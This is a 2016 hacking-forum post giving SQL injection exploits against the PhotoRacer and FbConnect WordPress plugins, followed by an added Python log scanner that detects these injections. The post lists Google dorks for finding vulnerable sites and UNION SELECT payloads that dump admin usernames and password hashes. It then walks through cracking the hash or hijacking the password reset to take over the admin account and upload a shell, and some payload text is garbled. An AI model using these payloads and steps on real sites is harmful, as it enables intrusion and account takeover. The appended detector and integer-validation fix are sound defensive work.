dEEpEst
Posted November 6, 2016

###
# Title : PhotoRacer & FbConnect SQL Injection Vulnerability
# Type : SQL Injection Exploit
# Security Risk : High
###

###
# Google Dork 1 :
# inurl:"wp-content/plugins/photoracer/viewimg.php?id=1
# Google Dork 2 :
# inurl:"?fbconnect_action=myhome&userid=1
###

###
# Exploit 1 :
/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,us er_pass),7,8,9+from+wp_users--
# Exploit 2 :
/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_*login,0x3a,user_pass )***8203;***8203;,7,8,9,10,11,12+from+wp_users--
###

[~] Choose your target, try to inject by using tools (Havij, Sql Poizon etc.) or manually ...

[~] Once you find Data : User, E-mail, Password or Activation Key, you need to crack the MD5(Wordpress) Hash
Example : $P$B4/7SILDqcoRQNvJiEgsAJW9midgZO0 = Administrator

[~] If you can't crack the Hash try another way " Reset Admin Password "
Example : http://www.yourtarget.com/wp-login.php?a...stpassword

[~] And paste the administrator E-mail and click "Get New Password"

[~] Now inject again because you need to take the activation key, that will be like this
Example : user_activation_key=1k34jcusHodi56edwkxA

[~] Now reset the Admin password using activation key
Example : http://www.yourtarget.com/wp-login.php?a...ogin=admin

[~] Set The New Password, login, upload shell or whatever you want, that's all ... Enjoy Hacking !
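Both parameters targeted in the post (`id` on `viewimg.php`, and `userid`/`fbuserid` with `fbconnect_action=myhome`) are numeric identifiers, so a non-integer value in a web server access log is a strong sign of injection attempts against these plugins. The following detector is an added example, not part of the original post; it assumes combined-format access logs, and its function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request target inside a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"\d+")

def numeric_params(path, params):
    """Parameters that should only ever hold an integer on the two endpoints in the post."""
    if path.endswith("/wp-content/plugins/photoracer/viewimg.php"):
        return ["id"]
    if params.get("fbconnect_action") == ["myhome"]:
        return ["userid", "fbuserid"]
    return []

def suspicious_params(request_target):
    """Return {name: decoded value} for integer parameters carrying anything else."""
    parts = urlsplit(request_target)
    # parse_qs percent-decodes and maps '+' to space, so encoded variants normalise.
    params = parse_qs(parts.query, keep_blank_values=True)
    hits = {}
    for name in numeric_params(parts.path, params):
        for value in params.get(name, []):
            if not INTEGER_RE.fullmatch(value):
                hits[name] = value
    return hits

def scan(log_lines):
    """Return (line number, client address, hits) for each flagged request."""
    findings = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        hits = suspicious_params(match.group(1)) if match else {}
        if hits:
            findings.append((number, line.split(" ", 1)[0], hits))
    return findings

# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [06/Nov/2016:10:00:01 +0000] "GET /wp-content/plugins/photoracer/viewimg.php?id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [06/Nov/2016:10:00:05 +0000] "GET /wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2 HTTP/1.1" 200 734',
    '198.51.100.7 - - [06/Nov/2016:10:00:09 +0000] "GET /?fbconnect_action=myhome&userid=1 HTTP/1.1" 200 8841',
    '203.0.113.9 - - [06/Nov/2016:10:00:12 +0000] "GET /?fbconnect_action=myhome&fbuserid=1%20and%201%3D2 HTTP/1.1" 200 910',
    '198.51.100.7 - - [06/Nov/2016:10:00:15 +0000] "GET /index.php?id=about HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for number, client, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {client} sent non-integer {hits}")
```

The same integer-only rule is the fix on the server side: casting or validating these parameters as integers before they reach a query removes the injection point.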